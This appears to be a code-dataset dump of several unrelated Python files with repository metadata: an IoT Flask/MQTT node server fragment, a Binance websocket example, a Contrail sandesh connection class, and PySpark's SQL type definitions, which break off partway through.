client.message_callback_add("data/#", data_callback)
client.message_callback_add("command/uplink/#", command_callback)
client.connect(args.b, 1883)
client.loop_start()
client.subscribe("data/#")
client.subscribe("command/uplink/#")
return http_response_code['success200']
def on_disconnect(client, user_data, rc):
print("Disconnected")
client.disconnect()
def health_check_handler():
while(1):
if health_check.get_health_check_mode():
healthcheck_server = '10.5.110.11' #'220.70.2.5'
healthcheck_port = 8085
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Connect to HealthCheck Server...')
client_socket.connect((healthcheck_server, healthcheck_port))
print("Connected to HealthCheck...")
print("healthcheck target: ", topic_manager.get_nodes())
health_check.setup_target_nodelist(topic_manager.get_nodes())
health_check.send_req(client)
time.sleep(health_check.get_time())
print("health_check: Send Json to HealthCheck Server...")
client_socket.sendall(health_check.create_msg())
# start the node webserver
app = Flask(__name__)
producer = KafkaProducer(bootstrap_servers=[args.k+':9092'], api_version=(0,10,2,0), value_serializer=lambda v: json.dumps(v).encode('utf-8'))
topic_manager = MqttMessages()
client = mqtt.Client()
app.debug = False
#app.threaded = True
health_check = HealthCheck()
actuator = Actuator()
mqtt_run()
# create socket and run health_check thread
health_check.set_health_check_mode(True)
th = threading.Thread(target=health_check_handler, args=())
th.start()
# setting interval of the health check time
@app.route('/health-check/set_time/<time>', methods=['GET'])
def health_check_set_time():
health_check.set_time(time)
return http_response_code['success200']
# interval of the health check time
@app.route('/health-check/time', methods=['GET'])
def health_check_get_time():
health_check.get_time()
return http_response_code['success200']
# make the format of the topics from the data which toiot server gave
@app.route('/topics', methods=['POST'])
def response_getMessageFormat():
topic_manager.clear_topics()
temp = json.loads(request.get_data().decode())
topic_manager.get_message_format(temp)
client.subscribe(topic_manager.mqtt_topic)
print(topic_manager.mqtt_topic)
return http_response_code['success200']
# delete sensor
@app.route('/sensor/<node>/<sensor>', methods=['GET', 'DELETE'])
def delete_sensor(sensor):
client.unsubscribe(topic_manager.get_delete_sensor(sensor))
return http_response_code['success200']
# delete arduino board
@app.route('/node/<node>', methods=['GET', 'DELETE'])
def delete_node(node):
client.unsubscribe(topic_manager.get_delete_node(node))
return http_response_code['success200']
# handle actuator
@app.route('/actuator', methods=['GET', 'POST'])
def actuator_command():
json_data = request.get_json(silent=True)
actuator.send_req(client, json_data)
return http_response_code['success200']
# error handlers
@app.errorhandler(400)
def page_bad_request(error):
return http_response_code['error400']
@app.errorhandler(401)
def page_unauthorized(error):
return http_response_code['error401']
@app.errorhandler(403)
def page_forbidden(error):
return http_response_code['error403']
@app.errorhandler(404)
def page_not_found(error):
return http_response_code['error404']
@app.errorhandler(408)
def page_timeout(error):
return http_response_code['error408']
| 30.824468
| 142
| 0.714927
|
4a022e72f965682bb57ab4f1f81d72bc1e626844
| 489
|
py
|
Python
|
examples/websocket/delivery/index_price.py
|
AlfonsoAgAr/binance-futures-connector-python
|
f0bd2c7b0576503bf526ce6be329ca2dae90fefe
|
[
"MIT"
] | 58
|
2021-11-22T11:46:27.000Z
|
2022-03-30T06:58:53.000Z
|
examples/websocket/delivery/index_price.py
|
sanjeevan121/binance-futures-connector-python
|
d820b73a15e9f64c80891a13694ca0c5d1693b90
|
[
"MIT"
] | 15
|
2021-12-15T22:40:52.000Z
|
2022-03-29T22:08:31.000Z
|
examples/websocket/delivery/index_price.py
|
sanjeevan121/binance-futures-connector-python
|
d820b73a15e9f64c80891a13694ca0c5d1693b90
|
[
"MIT"
] | 28
|
2021-12-10T03:56:13.000Z
|
2022-03-25T22:23:44.000Z
|
#!/usr/bin/env python
import time
import logging
from binance.lib.utils import config_logging
from binance.websocket.delivery.websocket_client import DeliveryWebsocketClient as Client
config_logging(logging, logging.DEBUG)
def message_handler(message):
print(message)
my_client = Client()
my_client.start()
my_client.index_price(
pair="BTCUSD",
speed = 1,
id=1,
callback=message_handler,
)
time.sleep(10)
logging.debug("closing ws connection")
my_client.stop()
| 17.464286
| 89
| 0.764826
|
4a02303bd41d0dfab71393f3d0265282e22ab486
| 7,552
|
py
|
Python
|
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# Sandesh Connection
#
import gevent
import os
from transport import TTransport
from protocol import TXMLProtocol
from sandesh_session import SandeshSession, SandeshReader
from sandesh_state_machine import SandeshStateMachine, Event
from sandesh_uve import SandeshUVETypeMaps
from gen_py.sandesh.ttypes import SandeshRxDropReason
from gen_py.sandesh.constants import *
class SandeshConnection(object):
def __init__(self, sandesh_instance, client, primary_collector,
secondary_collector, discovery_client):
self._sandesh_instance = sandesh_instance
self._logger = sandesh_instance.logger()
self._client = client
self._primary_collector = primary_collector
self._secondary_collector = secondary_collector
# Collector name. Updated upon receiving the control message
# from the Collector during connection negotiation.
self._collector = None
self._admin_down = False
self._state_machine = SandeshStateMachine(self, self._logger,
primary_collector,
secondary_collector)
self._state_machine.initialize()
from sandesh_common.vns.constants import \
COLLECTOR_DISCOVERY_SERVICE_NAME
if primary_collector is None and discovery_client is not None:
discovery_client.subscribe(COLLECTOR_DISCOVERY_SERVICE_NAME, 2,
self._handle_collector_update)
#end __init__
# Public methods
def session(self):
return self._state_machine.session()
#end session
def statemachine(self):
return self._state_machine
#end statemachine
def sandesh_instance(self):
return self._sandesh_instance
#end sandesh_instance
def server(self):
return self._state_machine.active_collector()
#end server
def primary_collector(self):
return self._primary_collector
#end primary_collector
def secondary_collector(self):
return self._secondary_collector
#end secondary_collector
def collector(self):
return self._collector
#end collector
def set_collector(self, collector):
self._collector = collector
#end set_collector
def reset_collector(self):
self._collector = None
#end reset_collector
def state(self):
return self._state_machine.state()
#end state
def handle_initialized(self, count):
uve_types = []
uve_global_map = self._sandesh_instance._uve_type_maps.get_uve_global_map()
for uve_type_key in uve_global_map.iterkeys():
uve_types.append(uve_type_key)
from gen_py.sandesh_ctrl.ttypes import SandeshCtrlClientToServer
ctrl_msg = SandeshCtrlClientToServer(self._sandesh_instance.source_id(),
self._sandesh_instance.module(), count, uve_types, os.getpid(), 0,
self._sandesh_instance.node_type(),
self._sandesh_instance.instance_id())
self._logger.debug('Send sandesh control message. uve type count # %d' % (len(uve_types)))
ctrl_msg.request('ctrl', sandesh=self._sandesh_instance)
#end handle_initialized
def handle_sandesh_ctrl_msg(self, ctrl_msg):
self._client.handle_sandesh_ctrl_msg(ctrl_msg)
#end handle_sandesh_ctrl_msg
def handle_sandesh_uve_msg(self, uve_msg):
self._client.send_sandesh(uve_msg)
#end handle_sandesh_uve_msg
def set_admin_state(self, down):
if self._admin_down != down:
self._admin_down = down
self._state_machine.set_admin_state(down)
#end set_admin_state
# Private methods
def _handle_collector_update(self, collector_info):
if collector_info is not None:
self._logger.info('Received discovery update %s for collector service' \
% (str(collector_info)))
old_primary_collector = self._primary_collector
old_secondary_collector = self._secondary_collector
if len(collector_info) > 0:
try:
self._primary_collector = collector_info[0]['ip-address'] \
+ ':' + collector_info[0]['port']
except KeyError:
self._logger.error('Failed to decode collector info from the discovery service')
return
else:
self._primary_collector = None
if len(collector_info) > 1:
try:
self._secondary_collector = collector_info[1]['ip-address'] \
+ ':' + collector_info[1]['port']
except KeyError:
self._logger.error('Failed to decode collector info from the discovery service')
return
else:
self._secondary_collector = None
if (old_primary_collector != self._primary_collector) or \
(old_secondary_collector != self._secondary_collector):
self._state_machine.enqueue_event(Event(
event = Event._EV_COLLECTOR_CHANGE,
primary_collector = self._primary_collector,
secondary_collector = self._secondary_collector))
#end _handle_collector_update
def _receive_sandesh_msg(self, session, msg):
(hdr, hdr_len, sandesh_name) = SandeshReader.extract_sandesh_header(msg)
if sandesh_name is None:
self._sandesh_instance.msg_stats().update_rx_stats('__UNKNOWN__',
len(msg), SandeshRxDropReason.DecodingFailed)
self._logger.error('Failed to decode sandesh header for "%s"' % (msg))
return
if hdr.Hints & SANDESH_CONTROL_HINT:
self._logger.debug('Received sandesh control message [%s]' % (sandesh_name))
if sandesh_name != 'SandeshCtrlServerToClient':
self._sandesh_instance.msg_stats().update_rx_stats(
sandesh_name, len(msg),
SandeshRxDropReason.ControlMsgFailed)
self._logger.error('Invalid sandesh control message [%s]' % (sandesh_name))
return
transport = TTransport.TMemoryBuffer(msg[hdr_len:])
protocol_factory = TXMLProtocol.TXMLProtocolFactory()
protocol = protocol_factory.getProtocol(transport)
from gen_py.sandesh_ctrl.ttypes import SandeshCtrlServerToClient
sandesh_ctrl_msg = SandeshCtrlServerToClient()
if sandesh_ctrl_msg.read(protocol) == -1:
self._sandesh_instance.msg_stats().update_rx_stats(
sandesh_name, len(msg),
SandeshRxDropReason.DecodingFailed)
self._logger.error('Failed to decode sandesh control message "%s"' %(msg))
else:
self._sandesh_instance.msg_stats().update_rx_stats(
sandesh_name, len(msg))
self._state_machine.on_sandesh_ctrl_msg_receive(session, sandesh_ctrl_msg,
hdr.Source)
else:
self._logger.debug('Received sandesh message [%s]' % (sandesh_name))
self._client.handle_sandesh_msg(sandesh_name,
msg[hdr_len:], len(msg))
#end _receive_sandesh_msg
#end class SandeshConnection
| 41.043478
| 100
| 0.637579
|
4a023123b6ecaf6b93b66d41a0626cf376b63156
| 51,697
|
py
|
Python
|
python/pyspark/sql/types.py
|
fusons/spark
|
39e2bad6a866d27c3ca594d15e574a1da3ee84cc
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 147
|
2017-11-22T09:18:46.000Z
|
2021-11-18T03:47:27.000Z
|
python/pyspark/sql/types.py
|
fusons/spark
|
39e2bad6a866d27c3ca594d15e574a1da3ee84cc
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 95
|
2016-08-29T09:00:58.000Z
|
2020-03-30T11:23:50.000Z
|
python/pyspark/sql/types.py
|
zhaolj66/spark-parent_2.11
|
10ac1f16d34cfbfad52758acadfa9af4907ba3a0
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 32
|
2017-11-23T00:21:26.000Z
|
2021-06-15T15:30:31.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import decimal
import time
import datetime
import calendar
import json
import re
import base64
from array import array
if sys.version >= "3":
long = int
basestring = unicode = str
from py4j.protocol import register_input_converter
from py4j.java_gateway import JavaClass
from pyspark.serializers import CloudPickleSerializer
__all__ = [
"DataType", "NullType", "StringType", "BinaryType", "BooleanType", "DateType",
"TimestampType", "DecimalType", "DoubleType", "FloatType", "ByteType", "IntegerType",
"LongType", "ShortType", "ArrayType", "MapType", "StructField", "StructType"]
class DataType(object):
"""Base class for data types."""
def __repr__(self):
return self.__class__.__name__
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@classmethod
def typeName(cls):
return cls.__name__[:-4].lower()
def simpleString(self):
return self.typeName()
def jsonValue(self):
return self.typeName()
def json(self):
return json.dumps(self.jsonValue(),
separators=(',', ':'),
sort_keys=True)
def needConversion(self):
"""
Does this type need to conversion between Python object and internal SQL object.
This is used to avoid the unnecessary conversion for ArrayType/MapType/StructType.
"""
return False
def toInternal(self, obj):
"""
Converts a Python object into an internal SQL object.
"""
return obj
def fromInternal(self, obj):
"""
Converts an internal SQL object into a native Python object.
"""
return obj
# This singleton pattern does not work with pickle, you will get
# another object after pickle and unpickle
class DataTypeSingleton(type):
"""Metaclass for DataType"""
_instances = {}
def __call__(cls):
if cls not in cls._instances:
cls._instances[cls] = super(DataTypeSingleton, cls).__call__()
return cls._instances[cls]
class NullType(DataType):
"""Null type.
The data type representing None, used for the types that cannot be inferred.
"""
__metaclass__ = DataTypeSingleton
class AtomicType(DataType):
"""An internal type used to represent everything that is not
null, UDTs, arrays, structs, and maps."""
class NumericType(AtomicType):
"""Numeric data types.
"""
class IntegralType(NumericType):
"""Integral data types.
"""
__metaclass__ = DataTypeSingleton
class FractionalType(NumericType):
"""Fractional data types.
"""
class StringType(AtomicType):
"""String data type.
"""
__metaclass__ = DataTypeSingleton
class BinaryType(AtomicType):
"""Binary (byte array) data type.
"""
__metaclass__ = DataTypeSingleton
class BooleanType(AtomicType):
"""Boolean data type.
"""
__metaclass__ = DataTypeSingleton
class DateType(AtomicType):
"""Date (datetime.date) data type.
"""
__metaclass__ = DataTypeSingleton
EPOCH_ORDINAL = datetime.datetime(1970, 1, 1).toordinal()
def needConversion(self):
return True
def toInternal(self, d):
if d is not None:
return d.toordinal() - self.EPOCH_ORDINAL
def fromInternal(self, v):
if v is not None:
return datetime.date.fromordinal(v + self.EPOCH_ORDINAL)
class TimestampType(AtomicType):
"""Timestamp (datetime.datetime) data type.
"""
__metaclass__ = DataTypeSingleton
def needConversion(self):
return True
def toInternal(self, dt):
if dt is not None:
seconds = (calendar.timegm(dt.utctimetuple()) if dt.tzinfo
else time.mktime(dt.timetuple()))
return int(seconds) * 1000000 + dt.microsecond
def fromInternal(self, ts):
if ts is not None:
# using int to avoid precision loss in float
return datetime.datetime.fromtimestamp(ts // 1000000).replace(microsecond=ts % 1000000)
class DecimalType(FractionalType):
"""Decimal (decimal.Decimal) data type.
The DecimalType must have fixed precision (the maximum total number of digits)
and scale (the number of digits on the right of dot). For example, (5, 2) can
support the value from [-999.99 to 999.99].
The precision can be up to 38, the scale must less or equal to precision.
When create a DecimalType, the default precision and scale is (10, 0). When infer
schema from decimal.Decimal objects, it will be DecimalType(38, 18).
:param precision: the maximum total number of digits (default: 10)
:param scale: the number of digits on right side of dot. (default: 0)
"""
def __init__(self, precision=10, scale=0):
self.precision = precision
self.scale = scale
self.hasPrecisionInfo = True # this is public API
def simpleString(self):
return "decimal(%d,%d)" % (self.precision, self.scale)
def jsonValue(self):
return "decimal(%d,%d)" % (self.precision, self.scale)
def __repr__(self):
return "DecimalType(%d,%d)" % (self.precision, self.scale)
class DoubleType(FractionalType):
"""Double data type, representing double precision floats.
"""
__metaclass__ = DataTypeSingleton
class FloatType(FractionalType):
"""Float data type, representing single precision floats.
"""
__metaclass__ = DataTypeSingleton
class ByteType(IntegralType):
"""Byte data type, i.e. a signed integer in a single byte.
"""
def simpleString(self):
return 'tinyint'
class IntegerType(IntegralType):
"""Int data type, i.e. a signed 32-bit integer.
"""
def simpleString(self):
return 'int'
class LongType(IntegralType):
"""Long data type, i.e. a signed 64-bit integer.
If the values are beyond the range of [-9223372036854775808, 9223372036854775807],
please use :class:`DecimalType`.
"""
def simpleString(self):
return 'bigint'
class ShortType(IntegralType):
"""Short data type, i.e. a signed 16-bit integer.
"""
def simpleString(self):
return 'smallint'
class ArrayType(DataType):
"""Array data type.
:param elementType: :class:`DataType` of each element in the array.
:param containsNull: boolean, whether the array can contain null (None) values.
"""
def __init__(self, elementType, containsNull=True):
"""
>>> ArrayType(StringType()) == ArrayType(StringType(), True)
True
>>> ArrayType(StringType(), False) == ArrayType(StringType())
False
"""
assert isinstance(elementType, DataType), "elementType should be DataType"
self.elementType = elementType
self.containsNull = containsNull
def simpleString(self):
return 'array<%s>' % self.elementType.simpleString()
def __repr__(self):
return "ArrayType(%s,%s)" % (self.elementType,
str(self.containsNull).lower())
def jsonValue(self):
return {"type": self.typeName(),
"elementType": self.elementType.jsonValue(),
"containsNull": self.containsNull}
@classmethod
def fromJson(cls, json):
return ArrayType(_parse_datatype_json_value(json["elementType"]),
json["containsNull"])
def needConversion(self):
return self.elementType.needConversion()
def toInternal(self, obj):
if not self.needConversion():
return obj
return obj and [self.elementType.toInternal(v) for v in obj]
def fromInternal(self, obj):
if not self.needConversion():
return obj
return obj and [self.elementType.fromInternal(v) for v in obj]
class MapType(DataType):
"""Map data type.
:param keyType: :class:`DataType` of the keys in the map.
:param valueType: :class:`DataType` of the values in the map.
:param valueContainsNull: indicates whether values can contain null (None) values.
Keys in a map data type are not allowed to be null (None).
"""
def __init__(self, keyType, valueType, valueContainsNull=True):
"""
>>> (MapType(StringType(), IntegerType())
... == MapType(StringType(), IntegerType(), True))
True
>>> (MapType(StringType(), IntegerType(), False)
... == MapType(StringType(), FloatType()))
False
"""
assert isinstance(keyType, DataType), "keyType should be DataType"
assert isinstance(valueType, DataType), "valueType should be DataType"
self.keyType = keyType
self.valueType = valueType
self.valueContainsNull = valueContainsNull
def simpleString(self):
return 'map<%s,%s>' % (self.keyType.simpleString(), self.valueType.simpleString())
def __repr__(self):
return "MapType(%s,%s,%s)" % (self.keyType, self.valueType,
str(self.valueContainsNull).lower())
def jsonValue(self):
return {"type": self.typeName(),
"keyType": self.keyType.jsonValue(),
"valueType": self.valueType.jsonValue(),
"valueContainsNull": self.valueContainsNull}
@classmethod
def fromJson(cls, json):
return MapType(_parse_datatype_json_value(json["keyType"]),
_parse_datatype_json_value(json["valueType"]),
json["valueContainsNull"])
def needConversion(self):
return self.keyType.needConversion() or self.valueType.needConversion()
def toInternal(self, obj):
if not self.needConversion():
return obj
return obj and dict((self.keyType.toInternal(k), self.valueType.toInternal(v))
for k, v in obj.items())
def fromInternal(self, obj):
if not self.needConversion():
return obj
return obj and dict((self.keyType.fromInternal(k), self.valueType.fromInternal(v))
for k, v in obj.items())
class StructField(DataType):
"""A field in :class:`StructType`.
:param name: string, name of the field.
:param dataType: :class:`DataType` of the field.
:param nullable: boolean, whether the field can be null (None) or not.
:param metadata: a dict from string to simple type that can be toInternald to JSON automatically
"""
def __init__(self, name, dataType, nullable=True, metadata=None):
"""
>>> (StructField("f1", StringType(), True)
... == StructField("f1", StringType(), True))
True
>>> (StructField("f1", StringType(), True)
... == StructField("f2", StringType(), True))
False
"""
assert isinstance(dataType, DataType), "dataType should be DataType"
assert isinstance(name, basestring), "field name should be string"
if not isinstance(name, str):
name = name.encode('utf-8')
self.name = name
self.dataType = dataType
self.nullable = nullable
self.metadata = metadata or {}
def simpleString(self):
return '%s:%s' % (self.name, self.dataType.simpleString())
def __repr__(self):
return "StructField(%s,%s,%s)" % (self.name, self.dataType,
str(self.nullable).lower())
def jsonValue(self):
return {"name": self.name,
"type": self.dataType.jsonValue(),
"nullable": self.nullable,
"metadata": self.metadata}
@classmethod
def fromJson(cls, json):
return StructField(json["name"],
_parse_datatype_json_value(json["type"]),
json["nullable"],
json["metadata"])
def needConversion(self):
return self.dataType.needConversion()
def toInternal(self, obj):
return self.dataType.toInternal(obj)
def fromInternal(self, obj):
return self.dataType.fromInternal(obj)
class StructType(DataType):
"""Struct type, consisting of a list of :class:`StructField`.
This is the data type representing a :class:`Row`.
Iterating a :class:`StructType` will iterate its :class:`StructField`s.
A contained :class:`StructField` can be accessed by name or position.
>>> struct1 = StructType([StructField("f1", StringType(), True)])
>>> struct1["f1"]
StructField(f1,StringType,true)
>>> struct1[0]
StructField(f1,StringType,true)
"""
def __init__(self, fields=None):
"""
>>> struct1 = StructType([StructField("f1", StringType(), True)])
>>> struct2 = StructType([StructField("f1", StringType(), True)])
>>> struct1 == struct2
True
>>> struct1 = StructType([StructField("f1", StringType(), True)])
>>> struct2 = StructType([StructField("f1", StringType(), True),
... StructField("f2", IntegerType(), False)])
>>> struct1 == struct2
False
"""
if not fields:
self.fields = []
self.names = []
else:
self.fields = fields
self.names = [f.name for f in fields]
assert all(isinstance(f, StructField) for f in fields),\
"fields should be a list of StructField"
self._needSerializeAnyField = any(f.needConversion() for f in self)
def add(self, field, data_type=None, nullable=True, metadata=None):
"""
Construct a StructType by adding new elements to it to define the schema. The method accepts
either:
a) A single parameter which is a StructField object.
b) Between 2 and 4 parameters as (name, data_type, nullable (optional),
metadata(optional). The data_type parameter may be either a String or a
DataType object.
>>> struct1 = StructType().add("f1", StringType(), True).add("f2", StringType(), True, None)
>>> struct2 = StructType([StructField("f1", StringType(), True), \\
... StructField("f2", StringType(), True, None)])
>>> struct1 == struct2
True
>>> struct1 = StructType().add(StructField("f1", StringType(), True))
>>> struct2 = StructType([StructField("f1", StringType(), True)])
>>> struct1 == struct2
True
>>> struct1 = StructType().add("f1", "string", True)
>>> struct2 = StructType([StructField("f1", StringType(), True)])
>>> struct1 == struct2
True
:param field: Either the name of the field or a StructField object
:param data_type: If present, the DataType of the StructField to create
:param nullable: Whether the field to add should be nullable (default True)
:param metadata: Any additional metadata (default None)
:return: a new updated StructType
"""
if isinstance(field, StructField):
self.fields.append(field)
self.names.append(field.name)
else:
if isinstance(field, str) and data_type is None:
raise ValueError("Must specify DataType if passing name of struct_field to create.")
if isinstance(data_type, str):
data_type_f = _parse_datatype_json_value(data_type)
else:
data_type_f = data_type
self.fields.append(StructField(field, data_type_f, nullable, metadata))
self.names.append(field)
self._needSerializeAnyField = any(f.needConversion() for f in self)
return self
def __iter__(self):
"""Iterate the fields"""
return iter(self.fields)
def __len__(self):
"""Return the number of fields."""
return len(self.fields)
def __getitem__(self, key):
"""Access fields by name or slice."""
if isinstance(key, str):
for field in self:
if field.name == key:
return field
raise KeyError('No StructField named {0}'.format(key))
elif isinstance(key, int):
try:
return self.fields[key]
except IndexError:
raise IndexError('StructType index out of range')
elif isinstance(key, slice):
return StructType(self.fields[key])
else:
raise TypeError('StructType keys should be strings, integers or slices')
def simpleString(self):
return 'struct<%s>' % (','.join(f.simpleString() for f in self))
def __repr__(self):
return ("StructType(List(%s))" %
",".join(str(field) for field in self))
def jsonValue(self):
return {"type": self.typeName(),
"fields": [f.jsonValue() for f in self]}
@classmethod
def fromJson(cls, json):
return StructType([StructField.fromJson(f) for f in json["fields"]])
def needConversion(self):
# We need convert Row()/namedtuple into tuple()
return True
def toInternal(self, obj):
if obj is None:
return
if self._needSerializeAnyField:
if isinstance(obj, dict):
return tuple(f.toInternal(obj.get(n)) for n, f in zip(self.names, self.fields))
elif isinstance(obj, (tuple, list)):
return tuple(f.toInternal(v) for f, v in zip(self.fields, obj))
elif hasattr(obj, "__dict__"):
d = obj.__dict__
return tuple(f.toInternal(d.get(n)) for n, f in zip(self.names, self.fields))
else:
raise ValueError("Unexpected tuple %r with StructType" % obj)
else:
if isinstance(obj, dict):
return tuple(obj.get(n) for n in self.names)
elif isinstance(obj, Row) and getattr(obj, "__from_dict__", False):
return tuple(obj[n] for n in self.names)
elif isinstance(obj, (list, tuple)):
return tuple(obj)
elif hasattr(obj, "__dict__"):
d = obj.__dict__
return tuple(d.get(n) for n in self.names)
else:
raise ValueError("Unexpected tuple %r with StructType" % obj)
def fromInternal(self, obj):
if obj is None:
return
if isinstance(obj, Row):
# it's already converted by pickler
return obj
if self._needSerializeAnyField:
values = [f.fromInternal(v) for f, v in zip(self.fields, obj)]
else:
values = obj
return _create_row(self.names, values)
class UserDefinedType(DataType):
"""User-defined type (UDT).
.. note:: WARN: Spark Internal Use Only
"""
@classmethod
def typeName(cls):
return cls.__name__.lower()
@classmethod
def sqlType(cls):
"""
Underlying SQL storage type for this UDT.
"""
raise NotImplementedError("UDT must implement sqlType().")
@classmethod
def module(cls):
"""
The Python module of the UDT.
"""
raise NotImplementedError("UDT must implement module().")
@classmethod
def scalaUDT(cls):
"""
The class name of the paired Scala UDT (could be '', if there
is no corresponding one).
"""
return ''
def needConversion(self):
return True
@classmethod
def _cachedSqlType(cls):
"""
Cache the sqlType() into class, because it's heavy used in `toInternal`.
"""
if not hasattr(cls, "_cached_sql_type"):
cls._cached_sql_type = cls.sqlType()
return cls._cached_sql_type
def toInternal(self, obj):
if obj is not None:
return self._cachedSqlType().toInternal(self.serialize(obj))
def fromInternal(self, obj):
v = self._cachedSqlType().fromInternal(obj)
if v is not None:
return self.deserialize(v)
def serialize(self, obj):
"""
Converts the a user-type object into a SQL datum.
"""
raise NotImplementedError("UDT must implement toInternal().")
def deserialize(self, datum):
"""
Converts a SQL datum into a user-type object.
"""
raise NotImplementedError("UDT must implement fromInternal().")
def simpleString(self):
return 'udt'
def json(self):
return json.dumps(self.jsonValue(), separators=(',', ':'), sort_keys=True)
def jsonValue(self):
if self.scalaUDT():
assert self.module() != '__main__', 'UDT in __main__ cannot work with ScalaUDT'
schema = {
"type": "udt",
"class": self.scalaUDT(),
"pyClass": "%s.%s" % (self.module(), type(self).__name__),
"sqlType": self.sqlType().jsonValue()
}
else:
ser = CloudPickleSerializer()
b = ser.dumps(type(self))
schema = {
"type": "udt",
"pyClass": "%s.%s" % (self.module(), type(self).__name__),
"serializedClass": base64.b64encode(b).decode('utf8'),
"sqlType": self.sqlType().jsonValue()
}
return schema
@classmethod
def fromJson(cls, json):
pyUDT = str(json["pyClass"]) # convert unicode to str
split = pyUDT.rfind(".")
pyModule = pyUDT[:split]
pyClass = pyUDT[split+1:]
m = __import__(pyModule, globals(), locals(), [pyClass])
if not hasattr(m, pyClass):
s = base64.b64decode(json['serializedClass'].encode('utf-8'))
UDT = CloudPickleSerializer().loads(s)
else:
UDT = getattr(m, pyClass)
return UDT()
def __eq__(self, other):
return type(self) == type(other)
_atomic_types = [StringType, BinaryType, BooleanType, DecimalType, FloatType, DoubleType,
ByteType, ShortType, IntegerType, LongType, DateType, TimestampType, NullType]
_all_atomic_types = dict((t.typeName(), t) for t in _atomic_types)
_all_complex_types = dict((v.typeName(), v)
for v in [ArrayType, MapType, StructType])
_FIXED_DECIMAL = re.compile("decimal\\(\\s*(\\d+)\\s*,\\s*(\\d+)\\s*\\)")
_BRACKETS = {'(': ')', '[': ']', '{': '}'}
def _parse_basic_datatype_string(s):
if s in _all_atomic_types.keys():
return _all_atomic_types[s]()
elif s == "int":
return IntegerType()
elif _FIXED_DECIMAL.match(s):
m = _FIXED_DECIMAL.match(s)
return DecimalType(int(m.group(1)), int(m.group(2)))
else:
raise ValueError("Could not parse datatype: %s" % s)
def _ignore_brackets_split(s, separator):
"""
Splits the given string by given separator, but ignore separators inside brackets pairs, e.g.
given "a,b" and separator ",", it will return ["a", "b"], but given "a<b,c>, d", it will return
["a<b,c>", "d"].
"""
parts = []
buf = ""
level = 0
for c in s:
if c in _BRACKETS.keys():
level += 1
buf += c
elif c in _BRACKETS.values():
if level == 0:
raise ValueError("Brackets are not correctly paired: %s" % s)
level -= 1
buf += c
elif c == separator and level > 0:
buf += c
elif c == separator:
parts.append(buf)
buf = ""
else:
buf += c
if len(buf) == 0:
raise ValueError("The %s cannot be the last char: %s" % (separator, s))
parts.append(buf)
return parts
def _parse_struct_fields_string(s):
parts = _ignore_brackets_split(s, ",")
fields = []
for part in parts:
name_and_type = _ignore_brackets_split(part, ":")
if len(name_and_type) != 2:
raise ValueError("The strcut field string format is: 'field_name:field_type', " +
"but got: %s" % part)
field_name = name_and_type[0].strip()
field_type = _parse_datatype_string(name_and_type[1])
fields.append(StructField(field_name, field_type))
return StructType(fields)
def _parse_datatype_string(s):
"""
Parses the given data type string to a :class:`DataType`. The data type string format equals
to :class:`DataType.simpleString`, except that top level struct type can omit
the ``struct<>`` and atomic types use ``typeName()`` as their format, e.g. use ``byte`` instead
of ``tinyint`` for :class:`ByteType`. We can also use ``int`` as a short name
for :class:`IntegerType`.
>>> _parse_datatype_string("int ")
IntegerType
>>> _parse_datatype_string("a: byte, b: decimal( 16 , 8 ) ")
StructType(List(StructField(a,ByteType,true),StructField(b,DecimalType(16,8),true)))
>>> _parse_datatype_string("a: array< short>")
StructType(List(StructField(a,ArrayType(ShortType,true),true)))
>>> _parse_datatype_string(" map<string , string > ")
MapType(StringType,StringType,true)
>>> # Error cases
>>> _parse_datatype_string("blabla") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _parse_datatype_string("a: int,") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _parse_datatype_string("array<int") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
>>> _parse_datatype_string("map<int, boolean>>") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
s = s.strip()
if s.startswith("array<"):
if s[-1] != ">":
raise ValueError("'>' should be the last char, but got: %s" % s)
return ArrayType(_parse_datatype_string(s[6:-1]))
elif s.startswith("map<"):
if s[-1] != ">":
raise ValueError("'>' should be the last char, but got: %s" % s)
parts = _ignore_brackets_split(s[4:-1], ",")
if len(parts) != 2:
raise ValueError("The map type string format is: 'map<key_type,value_type>', " +
"but got: %s" % s)
kt = _parse_datatype_string(parts[0])
